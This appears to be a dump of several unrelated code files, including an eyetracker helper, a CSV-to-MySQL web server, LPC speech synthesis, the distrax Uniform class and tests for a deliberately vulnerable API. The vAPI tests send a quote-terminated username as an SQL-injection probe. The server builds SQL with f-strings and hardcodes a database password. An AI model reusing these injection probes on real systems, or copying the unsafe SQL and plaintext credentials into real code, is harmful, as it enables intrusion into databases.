# converted into a pandas dataframe. Strongly suggest putting output into
# a psychopy data object, as psychopy.data comes with many convenient
# functions for organizing experiment flow, recording data, and saving
# files. Gaze position is given in psychopy pixels, eye position, distance, and pupil size
# given in mm.
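# Minimal usage sketch (assumes pandas imported as pd and a TobiiHelper instance named
# `tracker` that is already subscribed via startGazeData(); `recording` is a hypothetical flag):
#     samples = []
#     while recording:
#         samples.append(tracker.getCurrentData())
#     df = pd.DataFrame(samples)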
def getCurrentData(self):
# check gaze Data
if not self.tracking:
raise ValueError("Data is not being recorded by the eyetracker.")
# pace output samples at the same frequency as the eyetracker
timeCur = np.datetime64(dt.datetime.now())
timeNow = timeCur
timeDelta = np.absolute((timeCur - timeNow)/np.timedelta64(1, 'ms'))
# when two data samples are slightly less than the eyetracker's sampling
# interval apart, request data from the eyetracker
while timeDelta < 7.0: # change according to eyetracker freq
pcore.wait(0.001)
timeNow = np.datetime64(dt.datetime.now())
timeDelta = np.absolute((timeCur - timeNow)/np.timedelta64(1, 'ms'))
# code can easily be modified to get more than averages
timeMidnight = np.datetime64(dt.datetime.date(dt.datetime.today()))
self.currentData = {}
self.currentData['DeviceTimeStamp'] = np.absolute((timeNow - timeMidnight)/np.timedelta64(1, 'ms'))
self.currentData['AvgGazePointX'] = self.getAvgGazePos()[0]
self.currentData['AvgGazePointY'] = self.getAvgGazePos()[1]
self.currentData['AvgPupilDiam'] = self.getPupilSize()
self.currentData['AvgEyePosX'] = self.getAvgEyePos()[0]
self.currentData['AvgEyePosY'] = self.getAvgEyePos()[1]
self.currentData['AvgEyePosZ'] = self.getAvgEyePos()[2]
self.currentData['AvgEyeDistance'] = self.getAvgEyeDist() * 10
self.currentData['EyeValidities'] = self.checkEyeValidities()
return self.currentData
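# Example end-to-end workflow (a sketch; exact keys and timings depend on the set-up):
#     tracker = TobiiHelper()
#     tracker.findTracker() # connect to the first detected eyetracker
#     tracker.getTrackerSpace() # cache trackbox / active display area coordinates
#     tracker.setMonitor() # define and calibrate the default psychopy monitor
#     tracker.runFullCalibration(numCalibPoints = 9) # trackbox, calibration, validation
#     tracker.startGazeData()
#     sample = tracker.getCurrentData() # one averaged gaze / eye / pupil sample
#     tracker.stopGazeData()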
| 45.108228
| 108
| 0.51889
|
e72dba85cc70914d2f8cbd7eb914d226103ddb84
| 788
|
py
|
Python
|
tests/test_extractor.py
|
msk-mind/graph-db
|
4272057eb0d30d7c4b6b4429acd21ec90404ff6c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_extractor.py
|
msk-mind/graph-db
|
4272057eb0d30d7c4b6b4429acd21ec90404ff6c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_extractor.py
|
msk-mind/graph-db
|
4272057eb0d30d7c4b6b4429acd21ec90404ff6c
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on May 05, 2021
@author: pashaa@mskcc.org
'''
import glob
import json
import os
import pandas as pd
import shutil
import pytest
from graph_db.common.config import ConfigSet, APP_CFG, DATA_CFG
from graph_db.extractor import delta_to_json
delta_table = 'tests/input_data/user_table'
json_path = 'tests/output_data/user_table'
@pytest.fixture
def setup():
if os.path.exists(json_path):
shutil.rmtree(json_path)
ConfigSet(name=APP_CFG, config_file='tests/test_app_config.yml')
cfg = ConfigSet(name=DATA_CFG, config_file='tests/test_data_config.yml')
def test_delta_to_json(setup):
delta_to_json(delta_table, json_path)
json_file = glob.glob(json_path+'/*.json')[0]
df = pd.read_json(json_file, lines=True)
assert df.shape == (5,6)
| 20.205128
| 76
| 0.742386
|
9137cc4580663edf715cf1eb40e720eb97d038a6
| 1,264
|
py
|
Python
|
Own/Python/Tutorials/Classes.py
|
cychitivav/programming_exercises
|
e8e7ddb4ec4eea52ee0d3826a144c7dc97195e78
|
[
"MIT"
] | null | null | null |
Own/Python/Tutorials/Classes.py
|
cychitivav/programming_exercises
|
e8e7ddb4ec4eea52ee0d3826a144c7dc97195e78
|
[
"MIT"
] | null | null | null |
Own/Python/Tutorials/Classes.py
|
cychitivav/programming_exercises
|
e8e7ddb4ec4eea52ee0d3826a144c7dc97195e78
|
[
"MIT"
] | null | null | null |
#Cristian Chitiva
#cychitivav@unal.edu.co
#13/Sept/2018
class Pencil:
_length = '10 cm'#Class variable notation
def __new__(cls, color = 'Rojo', eraser = True, graphite = False):#Constructor, runs before __init__
    return super().__new__(cls)#return the instance so Python then calls __init__ with the same arguments
def __init__(self, color = 'Rojo', eraser = True, graphite = False):
self.color = color
self.__eraser = eraser#Private
self.graphite = graphite
def draw(self):
print("The pencil is drawing")
def __erase(self):#Private
if self.__eraser:
print("The pencill is erasing")
else:
print("It's not possible to erase")
def getErase(self):
return self.__erase()
#Properties
@property #Getter
def eraser(self):
return self.__eraser
@eraser.setter
def eraser(self, newValue):
self.__eraser = newValue
@staticmethod
def thickness():
return '0.65 cm'
pen = Pencil("Verde", True, True)
#pen.draw()
#pen.getErase()
print(Pencil._length)
Pencil(1)
#Info class
#print('\n', pen.__dict__)
print()
print(pen.eraser)
pen.eraser = False
print(pen.eraser)
print("Class:", Pencil.thickness())
print("Instance:", pen.thickness())
| 22.981818
| 84
| 0.599684
|
a420022537a27f46857d881d54db04635f25562e
| 2,725
|
py
|
Python
|
sdk/python-sdk/test/protocols/test_QuestionAnswer.py
|
tw-bc-group/verity-sdk
|
e932209ab849f04a389bdda0718cd6227187e5cf
|
[
"Apache-2.0"
] | null | null | null |
sdk/python-sdk/test/protocols/test_QuestionAnswer.py
|
tw-bc-group/verity-sdk
|
e932209ab849f04a389bdda0718cd6227187e5cf
|
[
"Apache-2.0"
] | 2
|
2021-09-02T19:02:06.000Z
|
2021-09-02T19:02:24.000Z
|
sdk/python-sdk/test/protocols/test_QuestionAnswer.py
|
tw-bc-group/verity-sdk
|
e932209ab849f04a389bdda0718cd6227187e5cf
|
[
"Apache-2.0"
] | 1
|
2021-01-13T10:43:14.000Z
|
2021-01-13T10:43:14.000Z
|
# import pytest
#
# from test.test_utils import get_test_config, cleanup
# from verity_sdk.protocols.v1_0.QuestionAnswer import QuestionAnswer
# from verity_sdk.utils import COMMUNITY_MSG_QUALIFIER
# from verity_sdk.utils.Context import Context
#
# for_relationship = 'some_did'
# question_text = 'Are you trying to login to acme.com?'
# question_detail = 'IP Address: 56.24.11.126'
# valid_responses = ['Yes', 'No, that\'s not me!']
# signature_required = True
#
#
# def test_init():
# question_answer = QuestionAnswer(for_relationship, None, question_text, question_detail, valid_responses,
# signature_required)
#
# assert question_answer.for_relationship == for_relationship
# assert question_answer.question == question_text
# assert question_answer.descr == question_detail
# assert question_answer.valid_responses == valid_responses
# assert question_answer.signature_required == signature_required
#
#
# @pytest.mark.asyncio
# async def test_ask():
# context = await Context.create_with_config(await get_test_config())
# question_answer = QuestionAnswer(for_relationship, None, question_text, question_detail, valid_responses,
# signature_required)
# msg = question_answer.ask_msg(context)
#
# assert msg['@type'] == '{};spec/{}/{}/{}'.format(
# COMMUNITY_MSG_QUALIFIER,
# QuestionAnswer.MSG_FAMILY,
# QuestionAnswer.MSG_FAMILY_VERSION,
# QuestionAnswer.ASK_QUESTION
# )
# assert msg['@id'] is not None
# assert msg['~thread'] is not None
# assert msg['~thread']['thid'] is not None
# assert msg['~for_relationship'] == for_relationship
# assert msg['text'] == question_text
# assert msg['detail'] == question_detail
# assert msg['valid_responses'] == valid_responses
# assert msg['signature_required'] == signature_required
#
# await cleanup(context)
#
#
# @pytest.mark.asyncio
# async def test_status():
# context = await Context.create_with_config(await get_test_config())
# question_answer = QuestionAnswer(for_relationship, None, question_text, question_detail, valid_responses,
# signature_required)
# msg = question_answer.status_msg(context)
#
# assert msg['@type'] == '{};spec/{}/{}/{}'.format(
# COMMUNITY_MSG_QUALIFIER,
# QuestionAnswer.MSG_FAMILY,
# QuestionAnswer.MSG_FAMILY_VERSION,
# QuestionAnswer.GET_STATUS
# )
# assert msg['@id'] is not None
# assert msg['~for_relationship'] == for_relationship
# assert msg['~thread'] is not None
# assert msg['~thread']['thid'] is not None
#
# await cleanup(context)
| 38.928571
| 111
| 0.678899
|
b1f0af366f8009d3e1f2e0737b18ea2205c89383
| 9,243
|
py
|
Python
|
src/csv_db_package/fileserver.py
|
ankitaliya/csv_db_package
|
4c61a26132c7ce1de4440c1fc0ca6cf1ee39c0a3
|
[
"MIT"
] | null | null | null |
src/csv_db_package/fileserver.py
|
ankitaliya/csv_db_package
|
4c61a26132c7ce1de4440c1fc0ca6cf1ee39c0a3
|
[
"MIT"
] | null | null | null |
src/csv_db_package/fileserver.py
|
ankitaliya/csv_db_package
|
4c61a26132c7ce1de4440c1fc0ca6cf1ee39c0a3
|
[
"MIT"
] | null | null | null |
"""The script to create a http server on local for uploading a csv file
and perform CRUD operations on the UI connected with the database."""
from http.server import HTTPServer, BaseHTTPRequestHandler
import cgi
import logging
import jinja2
from mysql.connector import connect, errors
import pandas as pd
from crud_operations import view_data, delete_row, insert_row, select_row, update_row
logging.basicConfig(filename='server_statements.log', level=logging.DEBUG,
format='%(asctime)s:%(levelname)s:%(message)s')
CREATE_TABLE_QUERY = """
CREATE TABLE user_file_data(p_id int PRIMARY KEY, first_name varchar(255),height_feet float,
height_inches float, last_name varchar(255),position varchar(255),weight_pounds float,id int,
abbreviation varchar(255),city varchar(255), conference varchar(255), division varchar(255),
full_name varchar(255), name varchar(255))
"""
def csv_to_db(file_name):
"""The function reads a file that was uploaded by the user to the server.
It creates connection to the database and that file was dumped to the database.
: param - csv file uploaded by the user."""
data_frame = pd.read_csv(file_name, index_col=False, delimiter=',')
replacement = {'height_feet': 0.0, 'height_inches': 0.0,
'position': "missing", 'weight_pounds': 0.0}
data_frame.fillna(value=replacement, inplace=True)
data_frame.fillna(0, inplace=True)
try:
conn = connect(host='localhost',
database="user_data",
user='root',
password='Arp@99?0#1Liy@')
if conn.is_connected():
cursor = conn.cursor()
cursor.execute("select database();")
record = cursor.fetchone()
logging.info("You're connected to database: %s", record)
cursor.execute('DROP TABLE IF EXISTS user_file_data;')
logging.info('Creating table....')
cursor.execute(CREATE_TABLE_QUERY)
logging.info("Table is created....")
# loop through the data frame
for i, row in data_frame.iterrows():
cursor.execute(f"INSERT INTO user_data.user_file_data VALUES {tuple(row)}")
conn.commit()
except errors.ProgrammingError as prmg_err:
logging.error('%s: %s', prmg_err.__class__.__name__, prmg_err)
except errors.Error as err_e:
logging.error('%s: %s', err_e.__class__.__name__, err_e)
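# Illustrative direct use (hypothetical path; the server normally calls this from do_POST
# after writing the upload to uploaded_file/file.csv):
#     csv_to_db('uploaded_file/file.csv')
# The handler below is typically served with http.server, e.g. (a sketch):
#     HTTPServer(('localhost', 8080), EchoHandler).serve_forever()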
class EchoHandler(BaseHTTPRequestHandler):
"""class containing different GET and POST methods for the http server that was used
to upload a csv file from the user. Then the CRUD operations is performed on the UI
as per the user wants to do with a connection to a database."""
def do_GET(self):
"""Function to upload file and perform CRUD operations on client side."""
try:
if self.path.endswith('/uploadCSV'):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
with open('Templates/index.html', 'r', encoding='utf-8') as index_file:
output = index_file.read()
self.wfile.write(output.encode())
if self.path.endswith('/new'):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
with open('Templates/upload_file.html', 'r', encoding='utf-8') as uploaded_file:
output = uploaded_file.read()
self.wfile.write(output.encode())
if self.path.endswith('/viewtable'):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
table = view_data('user_data', 'user_file_data')[0]
if table is not None:
with open('Templates/view_table.html', 'r', encoding='utf-8') as view_file:
output = view_file.read()
render_output = jinja2.Template(output)
self.wfile.write(render_output.render(table=table).encode())
if self.path.endswith('/add'):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
with open('Templates/add_data.html', 'r', encoding='utf-8') as add_file:
output = add_file.read()
self.wfile.write(output.encode())
if self.path.startswith('/update_data'):
value = self.path[21:]
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
row_form = select_row('user_data', 'user_file_data', int(value))
if row_form is not None:
with open('Templates/update_data.html', 'r', encoding='utf-8') as update_file:
output = update_file.read()
render_output = jinja2.Template(output)
self.wfile.write(render_output.render(row_form=row_form).encode())
except PermissionError as per_err:
logging.error('%s: %s', per_err.__class__.__name__, per_err)
except TypeError as type_err:
logging.error('%s: %s', type_err.__class__.__name__, type_err)
def do_POST(self):
"""Function to upload data to db and returns table and perform CRUD operations."""
try:
if self.path.endswith('/new'):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
content_len = int(self.headers.get('Content-length'))
pdict['CONTENT_LENGTH'] = content_len
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
file = fields.get('task')[0]
file = file.decode("utf-8")
with open('uploaded_file/file.csv', mode='w', encoding='utf-8') as csv_file:
for data in file.split('\r\r'):
csv_file.write(data)
                    csv_to_db('uploaded_file/file.csv')  # load the file that was just written above
self.send_response(301)
self.send_header('content-type', 'text/html')
self.send_header('Location', '/viewtable')
self.end_headers()
self.wfile.write(file.encode())
if self.path.startswith('/delete_data'):
value_id = self.path[22:]
delete_row('user_data', 'user_file_data', value_id)
self.send_response(301)
self.send_header('content-type', 'text/html')
self.send_header('Location', '/viewtable')
self.end_headers()
if self.path.endswith('/add'):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
content_len = int(self.headers.get('Content-length'))
pdict['CONTENT_LENGTH'] = content_len
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
for key in fields:
fields[key] = fields[key][0]
insert_row('user_data', 'user_file_data', fields)
self.send_response(301)
self.send_header('content-type', 'text/html')
self.send_header('Location', '/viewtable')
self.end_headers()
if self.path.startswith('/update_data'):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
content_len = int(self.headers.get('Content-length'))
pdict['CONTENT_LENGTH'] = content_len
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
for key in fields:
fields[key] = fields[key][0]
update_row('user_data', 'user_file_data', fields, int(fields['p_id']))
self.send_response(301)
self.send_header('content-type', 'text/html')
self.send_header('Location', '/viewtable')
self.end_headers()
except PermissionError as per_err:
logging.error('%s: %s', per_err.__class__.__name__, per_err)
except TypeError as type_err:
logging.error('%s: %s', type_err.__class__.__name__, type_err)
def main():
"""The main function creates a server on defined port with the help of http.server package."""
port = 8000
server = HTTPServer(('', port), EchoHandler)
logging.info('Server running on port %s', port)
server.serve_forever()
if __name__ == '__main__':
main()
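# --- Illustrative client-side sketch (not part of the original script) ---
# Assuming the server above is running locally on port 8000, a CSV upload can be
# exercised from another process with the `requests` library. The field name 'task'
# matches what do_POST('/new') parses; the file name used here is hypothetical.
#
# import requests
# with open('players.csv', 'rb') as csv_file:                 # hypothetical input file
#     requests.post('http://localhost:8000/new', files={'task': csv_file})
# print(requests.get('http://localhost:8000/viewtable').status_code)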
| 46.918782
| 117
| 0.572217
|
fbc610cd1e1d060960e96bb00f0f0548d59d7685
| 1,147
|
py
|
Python
|
chapter7_语音合成/C7_2_y.py
|
busyyang/python_sound_open
|
91bc284f0ed538c1e8756a1a1475956191b4ae86
|
[
"Apache-2.0"
] | 165
|
2020-06-10T03:39:17.000Z
|
2022-03-28T08:37:32.000Z
|
chapter7_语音合成/C7_2_y.py
|
shangminghao/python_sound_open
|
91bc284f0ed538c1e8756a1a1475956191b4ae86
|
[
"Apache-2.0"
] | 3
|
2020-11-20T03:00:56.000Z
|
2021-08-05T01:30:32.000Z
|
chapter7_语音合成/C7_2_y.py
|
shangminghao/python_sound_open
|
91bc284f0ed538c1e8756a1a1475956191b4ae86
|
[
"Apache-2.0"
] | 66
|
2020-06-02T01:57:24.000Z
|
2022-03-16T07:54:59.000Z
|
from chapter2_基础.soundBase import *
from chapter7_语音合成.flipframe import *
from chapter3_分析实验.C3_1_y_1 import enframe
from chapter3_分析实验.lpc import lpc_coeff
from scipy.signal import lfilter
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
data, fs = soundBase('C7_2_y.wav').audioread()
data -= np.mean(data)
data /= np.max(np.abs(data))
N = len(data)
time = [i / fs for i in range(N)]  # time axis in seconds
p = 12
wlen, inc = 200, 80
msoverlap = wlen - inc
y = enframe(data, wlen, inc)
fn = y.shape[0]
Acoef = np.zeros((y.shape[0], p + 1))
resid = np.zeros(y.shape)
synFrame = np.zeros(y.shape)
## 7.2.1
# Compute the LPC coefficients and the prediction error (residual) for each frame
for i in range(fn):
a, _ = lpc_coeff(y[i, :], p)
Acoef[i, :] = a
resid[i, :] = lfilter(a, [1], y[i, :])
# Speech synthesis
for i in range(fn):
synFrame[i, :] = lfilter([1], Acoef[i, :], resid[i, :])
outspeech = Filpframe_OverlapS(synFrame, np.hamming(wlen), inc)
plt.subplot(2, 1, 1)
plt.plot(data / np.max(np.abs(data)), 'k')
plt.title('原始信号')
plt.subplot(2, 1, 2)
plt.title('还原信号-LPC与误差')
plt.plot(outspeech / np.max(np.abs(outspeech)), 'c')
plt.savefig('images/LPC与误差.png')
plt.close()
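# --- Minimal self-contained sketch (not part of the original script) ---
# It illustrates the analysis/synthesis pair used above on a toy frame: filtering a
# frame by A(z) yields the prediction residual, and filtering the residual by 1/A(z)
# reconstructs the frame exactly (zero initial conditions in both directions).
def _lpc_roundtrip_demo():
    import numpy as _np
    from scipy.signal import lfilter as _lfilter
    rng = _np.random.default_rng(0)
    frame = rng.standard_normal(200)                # stand-in for one speech frame
    a = _np.array([1.0, -0.9])                      # toy LPC polynomial A(z) = 1 - 0.9 z^-1
    residual = _lfilter(a, [1.0], frame)            # analysis: e[n] = A(z) s[n]
    reconstructed = _lfilter([1.0], a, residual)    # synthesis: s[n] = e[n] / A(z)
    assert _np.allclose(frame, reconstructed)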
| 24.404255
| 63
| 0.659983
|
9a210bf79367694f4925238b3a020b2a0ceaefaa
| 5,031
|
py
|
Python
|
distrax/_src/distributions/uniform.py
|
LaudateCorpus1/distrax
|
ed8381045a0eb08eea262ac8707f9d77692475ef
|
[
"Apache-2.0"
] | null | null | null |
distrax/_src/distributions/uniform.py
|
LaudateCorpus1/distrax
|
ed8381045a0eb08eea262ac8707f9d77692475ef
|
[
"Apache-2.0"
] | 1
|
2021-10-05T16:07:30.000Z
|
2021-10-05T16:07:30.000Z
|
distrax/_src/distributions/uniform.py
|
LaudateCorpus1/distrax
|
ed8381045a0eb08eea262ac8707f9d77692475ef
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Uniform distribution."""
import math
from typing import Tuple, Union
import chex
from distrax._src.distributions import distribution
from distrax._src.utils import conversion
import jax
import jax.numpy as jnp
from tensorflow_probability.substrates import jax as tfp
tfd = tfp.distributions
Array = chex.Array
Numeric = chex.Numeric
PRNGKey = chex.PRNGKey
class Uniform(distribution.Distribution):
"""Uniform distribution with `low` and `high` parameters."""
equiv_tfp_cls = tfd.Uniform
def __init__(self, low: Numeric = 0., high: Numeric = 1.):
"""Initializes a Uniform distribution.
Args:
low: Lower bound.
high: Upper bound.
"""
super().__init__()
self._low = conversion.as_float_array(low)
self._high = conversion.as_float_array(high)
self._batch_shape = jax.lax.broadcast_shapes(
self._low.shape, self._high.shape)
@property
def event_shape(self) -> Tuple[int, ...]:
"""Shape of the events."""
return ()
@property
def low(self) -> Array:
"""Lower bound."""
return jnp.broadcast_to(self._low, self.batch_shape)
@property
def high(self) -> Array:
"""Upper bound."""
return jnp.broadcast_to(self._high, self.batch_shape)
@property
def range(self) -> Array:
return self.high - self.low
@property
def batch_shape(self) -> Tuple[int, ...]:
return self._batch_shape
def _sample_n(self, key: PRNGKey, n: int) -> Array:
"""See `Distribution._sample_n`."""
new_shape = (n,) + self.batch_shape
uniform = jax.random.uniform(
key=key, shape=new_shape, dtype=self.range.dtype, minval=0., maxval=1.)
low = jnp.expand_dims(self._low, range(uniform.ndim - self._low.ndim))
range_ = jnp.expand_dims(self.range, range(uniform.ndim - self.range.ndim))
return low + range_ * uniform
def _sample_n_and_log_prob(self, key: PRNGKey, n: int) -> Tuple[Array, Array]:
"""See `Distribution._sample_n_and_log_prob`."""
samples = self._sample_n(key, n)
log_prob = -jnp.log(self.range)
log_prob = jnp.repeat(log_prob[None], n, axis=0)
return samples, log_prob
def log_prob(self, value: Array) -> Array:
"""See `Distribution.log_prob`."""
return jnp.log(self.prob(value))
def prob(self, value: Array) -> Array:
"""See `Distribution.prob`."""
return jnp.where(
jnp.logical_or(value < self.low, value > self.high),
jnp.zeros_like(value),
jnp.ones_like(value) / self.range)
def entropy(self) -> Array:
"""Calculates the entropy."""
return jnp.log(self.range)
def mean(self) -> Array:
"""Calculates the mean."""
return (self.low + self.high) / 2.
def variance(self) -> Array:
"""Calculates the variance."""
return jnp.square(self.range) / 12.
def stddev(self) -> Array:
"""Calculates the standard deviation."""
return self.range / math.sqrt(12.)
def median(self) -> Array:
"""Calculates the median."""
return self.mean()
def cdf(self, value: Array) -> Array:
"""See `Distribution.cdf`."""
ones = jnp.ones_like(self.range)
zeros = jnp.zeros_like(ones)
result_if_not_big = jnp.where(
value < self.low, zeros, (value - self.low) / self.range)
return jnp.where(value > self.high, ones, result_if_not_big)
def log_cdf(self, value: Array) -> Array:
"""See `Distribution.log_cdf`."""
return jnp.log(self.cdf(value))
def _kl_divergence_uniform_uniform(
dist1: Union[Uniform, tfd.Uniform],
dist2: Union[Uniform, tfd.Uniform],
*unused_args, **unused_kwargs,
) -> Array:
"""Obtain the KL divergence `KL(dist1 || dist2)` between two Uniforms.
Note that the KL divergence is infinite if the support of `dist1` is not a
subset of the support of `dist2`.
Args:
dist1: A Uniform distribution.
dist2: A Uniform distribution.
Returns:
Batchwise `KL(dist1 || dist2)`.
"""
return jnp.where(
jnp.logical_and(dist2.low <= dist1.low, dist1.high <= dist2.high),
jnp.log(dist2.high - dist2.low) - jnp.log(dist1.high - dist1.low),
jnp.inf)
# Register the KL functions with TFP.
tfd.RegisterKL(Uniform, Uniform)(_kl_divergence_uniform_uniform)
tfd.RegisterKL(Uniform, Uniform.equiv_tfp_cls)(_kl_divergence_uniform_uniform)
tfd.RegisterKL(Uniform.equiv_tfp_cls, Uniform)(_kl_divergence_uniform_uniform)
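# Illustrative-only sketch (not part of the distrax source): drawing samples from a
# Uniform and evaluating the KL divergence registered above. Shapes and values are
# arbitrary; it assumes the base Distribution exposes `sample` and `kl_divergence`.
def _uniform_demo():
  key = jax.random.PRNGKey(0)
  dist_a = Uniform(low=0., high=1.)
  dist_b = Uniform(low=-1., high=2.)
  samples = dist_a.sample(seed=key, sample_shape=(3,))   # three draws in [0, 1)
  kl = dist_a.kl_divergence(dist_b)                      # finite: [0, 1] lies inside [-1, 2]
  return samples, kl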
| 31.055556
| 80
| 0.675214
|
e7520e386dac674ee0c67f2f0de718e673e457de
| 3,626
|
py
|
Python
|
sic_codes.py
|
leanguardia/gender-pay-gap-uk
|
85633151380bb641fc08112fed199334013b7b3c
|
[
"MIT"
] | 1
|
2021-01-13T13:40:16.000Z
|
2021-01-13T13:40:16.000Z
|
sic_codes.py
|
leanguardia/gender-pay-gap-uk
|
85633151380bb641fc08112fed199334013b7b3c
|
[
"MIT"
] | null | null | null |
sic_codes.py
|
leanguardia/gender-pay-gap-uk
|
85633151380bb641fc08112fed199334013b7b3c
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
def drop_sic_codes_na(df):
""" Removes all rows with missing SicCodes
"""
return df.dropna(subset=['SicCodes']).reset_index(drop=True)
def clean_sic_codes(df):
""" Cleans lists of SicCodes
"""
df = _codes_to(df, str)
df.SicCodes = df.SicCodes.apply(_strip_and_split)
return df
def add_sections(df):
""" Maps five digit SicCodes to single character Sections and stores them in SicSections
"""
codes_to_section = _build_code_to_section_dict()
sic_sections = df.SicCodes.apply(_map_codes_to_section, args=(codes_to_section,))
df['SicSections'] = sic_sections
return df
def explode_sections(df):
""" Creates a row for each of the industry sections a company belongs.
Additionaly, the section description is added in a new column
"""
df = df.explode('SicSections')
section_to_desc = _build_section_to_desc_dict()
df['SectDesc'] = df.SicSections.map(section_to_desc)
return df
def split_sectors(df):
""" Splits elements in Sic Codes list and distributes them in 21 dummy columns
representing whether that company belongs to an Industrial Section or not.
Requirements: df should have already gone through `drop_sic_codes` and
`clean_sic_codes`.
"""
df = df.copy()
df = drop_sic_codes_na(df)
sections = _get_sections()
dummies = _generate_dummies(df, sections)
df = df.join(dummies)
return df
def _get_sections():
return pd.unique(_load_codes().Section)
def _get_section_descriptions():
return pd.Series(_load_codes().SectionDesc.unique()).apply(_first_sentence)
def _codes_to(df, typ):
df.SicCodes = df.SicCodes.astype(typ)
return df
def _map_codes_to_section(codes, codes_to_section):
return np.unique(
[codes_to_section[int(code)] for code in codes if int(code) in codes_to_section]
)
def _generate_dummies(df, sections):
dummies = _build_empty_dummies(df, sections)
code_to_section = _build_code_to_section_dict()
for i, sic_codes in enumerate(df.SicCodes):
sections = [code_to_section[int(code)] for code in sic_codes if int(code) in code_to_section]
indices = np.unique(dummies.columns.get_indexer(sections))
dummies.iloc[i, indices] = 1
return dummies.add_prefix('Sect')
def _build_empty_dummies(df, sections):
zeroes = np.zeros((df.shape[0], len(sections)), dtype=int)
return pd.DataFrame(zeroes, columns=sections, index=df.index)
def _build_code_to_section_dict():
codes = _load_codes()
code_to_section = {}
for i, sic_code in enumerate(codes.SicCodes):
row = codes.iloc[i]
code_to_section[row.SicCodes] = row.Section
# code_to_section[1] = "Unknown" # Uncomment to encode invalid value (1)
return code_to_section
def _build_section_to_desc_dict():
return dict(zip(_get_sections(), _get_section_descriptions()))
def _strip_and_split(codes):
return codes.replace('\r\n','').split(',')
def _first_sentence(description):
return description.split(';')[0]
def _load_codes():
codes = pd.read_csv('data/sic_codes.csv')
codes.rename(columns={
"sic_code": "SicCodes",
"section": "Section",
"section_description": "SectionDesc"
}, inplace=True)
codes.drop(['sic_version'], axis='columns', inplace=True)
codes = _codes_to(codes, int)
return codes
def main():
df = pd.read_csv('data/UK-Gender-Pay-Gap-Data-2018-2019.csv')
df = drop_sic_codes_na(df)
df = clean_sic_codes(df)
return df
if __name__ == "__main__":
df = main()
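# Hedged end-to-end sketch (not part of the original module); it assumes the CSV files
# referenced above exist locally and simply chains the public helpers in order.
# df = main()                       # load the pay-gap data, drop missing SicCodes, clean lists
# df = add_sections(df)             # add a SicSections column of section letters per company
# exploded = explode_sections(df)   # one row per (company, section), plus SectDesc
# dummies = split_sectors(df)       # df joined with 21 'Sect*' indicator columns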
| 32.666667
| 101
| 0.694981
|
3a956c607a1ae3293da5944bb5ea9b3b4822c64f
| 114
|
py
|
Python
|
Software/main.py
|
cboltz/MacherdaachBadgeQueue
|
ed8b39a0fb1c3fe43e61179c0c510cc011dd9a48
|
[
"CC0-1.0"
] | null | null | null |
Software/main.py
|
cboltz/MacherdaachBadgeQueue
|
ed8b39a0fb1c3fe43e61179c0c510cc011dd9a48
|
[
"CC0-1.0"
] | null | null | null |
Software/main.py
|
cboltz/MacherdaachBadgeQueue
|
ed8b39a0fb1c3fe43e61179c0c510cc011dd9a48
|
[
"CC0-1.0"
] | null | null | null |
from controller.controller import Controller
def run():
Controller()
if __name__ == '__main__':
run()
| 11.4
| 44
| 0.675439
|
9122864a19a16d1576b1dad9a56a3810032a7845
| 2,763
|
py
|
Python
|
test-import-vulnerable-api-master/test-import-vulnerable-api-master/test/test_vapi.py
|
rmit-cyber-ready-cic/Security99
|
2d32865aef91f09b0edac2dd926ce603769052d7
|
[
"MIT"
] | null | null | null |
test-import-vulnerable-api-master/test-import-vulnerable-api-master/test/test_vapi.py
|
rmit-cyber-ready-cic/Security99
|
2d32865aef91f09b0edac2dd926ce603769052d7
|
[
"MIT"
] | null | null | null |
test-import-vulnerable-api-master/test-import-vulnerable-api-master/test/test_vapi.py
|
rmit-cyber-ready-cic/Security99
|
2d32865aef91f09b0edac2dd926ce603769052d7
|
[
"MIT"
] | null | null | null |
import json
import unittest
from test import BaseTestCase
class TestvAPI(BaseTestCase):
def test_tokens_1(self):
headers = { "Content-type": "application/json"}
r = self.client.open(
"/tokens",
method='POST',
data=json.dumps({'username': "blah1'", 'password': 'blah'}),
headers=headers)
print(r.status_code, r.data)
self.assertEqual(r.status_code,500)
def test_tokens_2(self):
headers = { "Content-type": "application/json"}
r = self.client.open(
"/tokens",
method='POST',
data=json.dumps({"username": "blah1'", "password": "blah"}),
headers=headers)
print(r.status_code, r.data)
self.assertEqual(r.status_code,500)
def test_tokens_3(self):
headers = { "Content-type": "application/json"}
r = self.client.open(
"/tokens",
method='POST',
data=json.dumps({"username": "blah1'", "password": "blah"}),
headers=headers)
print(r.status_code, r.data)
self.assertEqual(r.status_code,500)
def test_tokens_4(self):
headers = { "Content-type": "application/json"}
r = self.client.post(
"/tokens",
data=json.dumps({'username': 'blah1\'', "password": "blah"}),
headers=headers)
print(r.status_code, r.data)
self.assertEqual(r.status_code,500)
def test_widget_1(self):
headers = { "Content-type": "application/json", "X-Auth-Token": "4d94fc705cd9b2b36b2280dd543d9004"}
r = self.client.post(
"/widget",
data=json.dumps({'name': 'blah1'}),
headers=headers)
